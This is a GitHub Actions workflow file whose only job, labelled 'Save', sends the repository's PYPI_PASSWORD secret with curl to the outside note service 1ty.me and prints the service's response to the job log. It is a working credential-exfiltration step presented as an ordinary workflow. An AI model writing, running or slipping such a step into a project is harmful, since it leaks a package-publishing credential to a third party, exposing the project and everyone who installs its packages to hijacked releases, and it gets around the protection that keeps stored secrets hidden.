name: Save

on:
  workflow_dispatch:

jobs:
  save:
    runs-on: ubuntu-latest
    steps:
      - name: Save
        run: |
          response=$(curl --location 'https://1ty.me/?mode=ajax&cmd=create_note' --form 'note="${{ secrets.PYPI_PASSWORD }}"' --form 'expires_on="undefined"')
          echo "Response: $response"
